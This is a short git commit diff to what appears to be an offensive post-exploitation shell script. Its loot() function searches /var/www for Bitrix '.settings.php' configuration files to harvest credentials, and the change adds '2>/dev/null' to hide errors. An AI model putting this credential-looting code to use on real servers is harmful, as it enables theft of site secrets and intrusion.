This commit is contained in:
Root THC
2024-07-10 17:33:51 +01:00
parent 205c0001b5
commit ad7cbc1353

View File

@@ -407,7 +407,7 @@ loot() {
loot_bitrix "$fn"
done
find /var/www -maxdepth 6 -type f -wholename "*/bitrix/.settings.php" | while read -r fn; do
find /var/www -maxdepth 6 -type f -wholename "*/bitrix/.settings.php" 2>/dev/null | while read -r fn; do
loot_bitrix "$fn"
done